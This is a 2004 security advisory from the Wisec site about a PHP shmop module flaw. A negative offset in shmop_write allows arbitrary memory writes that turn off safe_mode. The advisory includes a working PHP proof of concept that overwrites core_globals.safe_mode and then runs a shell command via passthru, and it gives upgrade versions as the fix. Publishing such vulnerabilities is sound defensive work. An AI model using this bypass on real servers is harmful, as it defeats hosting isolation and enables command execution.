THP Wisec USH DigitalBullets TheHackersPlace network
The WIse SECurity
.italian
.english
Wisec Home SecSearch Projects Papers Security Thoughts
 
News
Flash Application Testing: A New Vector for XSS and Cross Site Flashing.
IE and Firefox Digest Authentication Request Splitting.
Php import_req_var globals overwrite Advisory.
Subverting Ajax - The Paper.
Adobe Plugin Multiple Vulnerabilities.
Wisec@23rd.CCC Congress in Berlin - 29th Dec. 2006 - Subverting Ajax.
SecSearch. Search Engine for Security Community.
Mysql COM_TABLE_DUMP Flaws.
Mysql Anonymous login Flaw.
A new project to stop embed passwords in Php scripts: PassBroker.
MySQL new three vulnerabilities unleashed
PHP shmop safemode bypass
PHP RFC1867 Vuln - POC Released!
Search on Wisec
Google

Vulnerability in Php shmop module: write of arbitrary memory - Safe Mode Bypass

Title:

PHP Safe_mode Bypass in shmop module

Autore:

Stefano Di Paola

Vulnerable:

Php <= 5.0.2 & 4.3.9 if shmop module is loaded.

Type of Vulnerability:

Input Validation - write of arbitrary memory

Resources:

Published on Bugtraq e VulnWatch

Summary

Shared Memory PHP Module has a memory leak when shmop_write function checks for offset bounds.
This flaw could lead to bypass Safe Mode and other bad things.

Description

shmop.c in PHP_FUNCTION(shmop_write)
function does not check if the 'offset' value is negative,
so it is possible to overwrite arbitrary memory with:
 memcpy(shmop->addr + offset, data, writesize);
this, in particular can be used to set safe_mode to off.
Attached there's a Proof of concept for this vuln.
It needs some gdb debugging or print the address of core_globals.safe_mode
and some try to get the right distance to set in '$offset'.

Of course shmop.so needs to be loaded as module or embedded in php bins.:)
<?
/*
   Php Safe_mode Bypass Proof of concept.

   Copyright 2004 Stefano Di Paola stefano.dipaola[at]wisec.it

   Disclaimer: The author is not responsible of any damage this script can cause

*/

 $shm_id = shmop_open(0xff2, "c", 0644, 100);
  if (!$shm_id) {
    echo "Couldn't create shared memory segment\n";
    die;
 }

// $data="\x01";
// the new value for safe_mode
 $data="\x00";

// this (-3842685) is my offset to reach core_globals.safe_mode
// taken with gdb. (0x40688d83)
 $offset=-3842685;
// Lets write the new value at our offset.
$shm_bytes_written = shmop_write($shm_id, $data, $offset );
if ($shm_bytes_written != strlen($data)) {
   echo "Couldn't write the entire length of data\n";
}

//Now lets delete the block and close the shared memory segment
if (!shmop_delete($shm_id)) {
   echo "Couldn't mark shared memory block for deletion.";
}
shmop_close($shm_id);

// Let's try if safe mode has been set to off
echo passthru("id");
dl("shmop.so");
?>

Solution:

Update php to 5.0.3 or 4.3.10

Florence,19 Dicembre 2004

Wisec is brought to you by...

Wisec is written and mantained by Stefano Di Paola.

Wisec uses open standards, including XHTML, CSS2, and XML-RPC.

All Rights Reserved 2004
All hosted messages and metadata are owned by their respective authors.